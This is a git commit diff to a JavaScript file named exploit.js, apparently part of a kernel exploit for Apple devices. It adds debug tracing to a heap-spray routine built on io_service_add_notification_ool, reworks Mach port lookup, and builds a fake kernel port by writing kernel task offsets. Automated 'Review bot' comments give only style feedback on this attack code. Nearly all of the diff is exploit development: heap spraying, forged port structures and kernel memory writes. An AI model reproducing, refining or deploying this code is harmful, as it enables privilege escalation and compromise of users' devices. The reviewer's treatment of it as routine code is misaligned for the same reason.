authorspv420 <spv@spv.sh>2022-07-29 12:21:35 -0400
committerspv420 <spv@spv.sh>2022-07-29 12:21:35 -0400
commit5ffc1a10b206f367c135330405833d7c59de56cb (patch)
treedfdb6f62049d6c1ef1150ed35f1efe211f442305 /src/js/kexp
parent66d18219be2629aa1c31c180d94f49b62812802a (diff)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js74
1 files changed, 30 insertions, 44 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
var ret = 0;
var master = shit_heap(4);
- host_get_io_master(mach_host_self(), master);
- io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ ret = host_get_io_master(mach_host_self(), master);
+ printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+// scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+ ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
+ printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
return ret;
}
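Review bot: The commented-out `scall("printf", ...)` line added at L27 is dead code kept under a comment; delete it rather than carrying it in the file, and the same applies to the commented-out lines this commit adds in later hunks (`// return;` at L97, `// mach_ports_lookup_shit_dealloc();` at L107, `// var fake_port = ...` at L129, `// write_u32(ptr, ...)` at L138). The three new `yahtzee` / `yahtzee2` / `yahtzee3` printfs are debug tracing whose labels say nothing about which call they report, which makes the output hard to read back; name the call instead, e.g. `printf("host_get_io_master: %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));`. Note also that `ret` from host_get_io_master is printed and then overwritten on L28 without being looked at, so the first status line is informational only. The `function spray(dict, size, port)` header is above this hunk; the hunk's closing `}` appears to end it.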
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
// return 0x42603;
}
-function mach_ports_lookup_shit_dealloc() {
- printf("fuck\n");
- var arrz = shit_heap(4);
- printf("fuck\n");
- write_u32(arrz, 0);
- printf("fuck\n");
- var sz = shit_heap(4);;
- printf("fuck\n");
- write_u32(sz, 3);
- printf("fuck\n");
-// var mts = mach_task_self();
- printf("fuck\n");
- calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
- puts("helo");
- printf("mpl success\n");
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
- printf("mpl success\n");
-
- for (var i = 0; i < read_u32(sz); i++) {
- if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
- printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
- mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
- printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
- }
- }
-
- return read_u32(read_u32(arrz) + 8);
-// return 0x42603;
-}
-
var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- spray(big_buf, big_size, dummy);
+ var dummy = shit_heap(4);
+ spray(big_buf, read_u32(big_size), dummy);
}
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
+ var dummy = shit_heap(4);
if (i % 4 == 0) {
printf("spray_ports %d\n", i);
}
write_u32(fp + (i << 2), spray_ports(1));
- spray(small_buf, small_size, dummy);
+ spray(small_buf, read_u32(small_size), dummy);
}
sched_yield();
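Review bot: The `var dummy = shit_heap(4);` added inside each loop body (L78, L85) re-declares the function-scoped `var dummy` that is already declared and assigned just before the loop (L75, L82); because `var` is hoisted, both are the same binding and the pre-loop allocations are now dead stores that are overwritten on the first iteration. Either drop the two pre-loop `var dummy = shit_heap(4);` lines or keep a single declaration, and if the intent is one fresh allocation per iteration a short comment on the in-loop line (`// fresh port slot per spray call`) would make that explicit. If the interpreter this runs under supports it, `let dummy` inside the loop would express the per-iteration scope; from this hunk alone it is not clear whether ES6 syntax is available. The enclosing `again: while (true)` loop starts and ends outside this hunk.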
@@ -489,15 +466,23 @@ again: while (true) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+// return;
+
+
+ var arrz = shit_heap(16);
+ write_u32(arrz, 0);
+ write_u32(arrz + 4, 0);
+ write_u32(arrz + 8, 0);
+ write_u32(arrz + 12, 0);
+ var sz = shit_heap(4);
+ write_u32(sz, 3);
+// mach_ports_lookup_shit_dealloc();
+ var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+ mach_ports_lookup(mach_task_self(), arrz, sz);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
- var arrmpt = shit_heap(16);
- write_u32(arrmpt, 0);
- write_u32(arrmpt + 4, 0);
- write_u32(arrmpt + 8, 0);
- write_u32(arrmpt + 12, 0);
- mach_ports_lookup_shit_dealloc();
- var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- mach_ports_lookup_shit();
+ var fake_port = read_u32(read_u32(arrz) + 8);
printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
// while (true) {
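Review bot: `ret__` is assigned from r3gister on L108 but only reported on L121, after `mach_ports_lookup` and two debug prints have run in between, and the `printf("%d %s\n", ...)` on L121 gives no hint which call's status it shows; move the report next to the call or label it, e.g. `printf("r3gister: %d %s\n", ret__, mach_error_string(ret__));`. The `mach_ports_lookup(...)` call on L109 discards its return value while L110 and L120 immediately read through `arrz`; capturing and printing that status in the same labelled form would make the `done %x ...` line interpretable when it shows zeros. The `// return;` on L97 and the commented-out dealloc call on L107 are dead code. The enclosing `again:` loop starts and ends outside this hunk.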
@@ -509,7 +494,7 @@ again: while (true) {
/*
* BEGIN JANK FUCKING HACK
*/
- var fake_port = mach_ports_lookup_shit();
+// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
printf("%x\n", fake_port);
printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
- write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, 0x73707621);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
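Review bot: The literal `0x73707621` written on L139 replaces the computed value from L137 with an unexplained magic number, and nothing in the hunk says what it represents; its bytes are ASCII `'s','p','v','!'`, which looks like a recognisable marker value rather than a real pointer, but that is an inference. Add a comment on the line stating its purpose, e.g. `// marker value (ASCII "spv!") written in place of the computed pointer — TODO confirm this is intentional`, and if the commented-out computation on L138 is the intended final form, say so in the comment instead of keeping both lines. The enclosing function continues past the end of this hunk.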